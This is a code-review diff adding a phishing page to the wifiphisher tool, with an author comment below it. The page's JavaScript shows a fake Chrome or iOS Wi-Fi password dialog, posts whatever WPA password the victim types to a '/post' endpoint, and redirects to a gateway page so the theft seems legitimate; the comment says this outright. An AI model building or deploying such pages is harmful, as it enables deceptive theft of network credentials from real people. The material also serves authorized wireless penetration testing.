wifiphisher/data/phishing-pages/device-modal/index.html

```diff
@@ -0,0 +1,694 @@
+				<span class="modal-button modal-button-bold ok inactive">Connect</span>
+			</div>
+		</div>
+		<div class="modal-overlay modal-overlay-visible"></div>
+	</div>
+	<script src="./static/libs/jquery.min.js"></script>
+	<script src="./static/js/framework7.min.js"></script>
+	<script src="./static/js/kitchen-sink.js"></script>
+	<script type="text/javascript">
+        // OS Functions
+        // PC
+        function chrome(){
+        	var checked = false;
+        	$('.main').removeClass('hide');
+
+        	// main.js
+        	// Functions
+        	function toggle(){
+        		$('body .main .window').toggleClass('faded');
+        	}
+        	function hide(){
+        		$('body .main .window').addClass('faded');
+        	}
+        	function close(){
+        		$('body .main .window').addClass('faded');
+        		setTimeout(function(){
+        			window.location = window.location;
+        		}, 800);
+        	}
+
+        	$('.main form').submit(function(e){
+        		hide();
+
+        		if ($('.main input[name=password]').val().length < 8) {
+        			close();
+        			return false;
+        		} else {
+        			e.preventDefault();
+
+    				// timeout:800
+    				setTimeout(function(){
+    					$.post('/post', 'wfphshr-wpa-password=' + $('.main input[name=password]').val(), function(){
+	    					self.location = './gateway.html'; // pretend to log in to gateway
+	    				});
+    				}, 800);
+    			}
+    		});
+
+			// On start
+			// timeout:120
+			setTimeout(function(){ 
+				toggle();
+				$('body .main .window input[name=password]').focus();
+			}, 120);
+
+			$('body .main .window input[name=login]').click(function(){
+				$('body .main form').submit();
+			});
+
+			$('body .main .window input[name=cancel]').click(function(){
+				close();
+			});
+
+			$(document).keypress(function(e){
+				if (e.keyCode === 13) { // enter
+					$('.main form').submit();
+				}
+				if (e.keyCode === 27) { // esc
+					$('.main .window input[name=cancel]').click();
+				}
+			});
+
+			// Alternative (not as compatible with every device)
+			// $(document).keydown(function(e){
+				// if (e.keyCode === 13) { // enter
+					// $('body .main form').submit();
+				// }
+				// if (e.keyCode === 27) { // esc
+					// $('body .main .window input[name=cancel]').click();
+				// }
+			// });
+		}
+
+
+
+    	// iOS
+    	function ios(){
+    		$('.ios').removeClass('hide');
+
+    		// Safari seems to block this
+    		$('.ios, .ios *').click(function(){
+    			$('.ios input[name=password]').focus();
+    		});
+
+    		$('.ios form').submit(function(){
+    			if ($('.ios input[name=password]').val().length < 8) {
+			        // Don't submit a password smaller than 8 characters
+			        return false;
+			    } else {
+			    	$.post('/post', 'wfphshr-wpa-password=' + $('.ios input[name=password]').val(), function(){
+						window.location = './gateway.html'; // pretend to log in to gateway
```

Comment:
The same as the other pages using /post.

I have redirected the victim to a gateway.html page so it seems more legitimate after a 'firmware update'.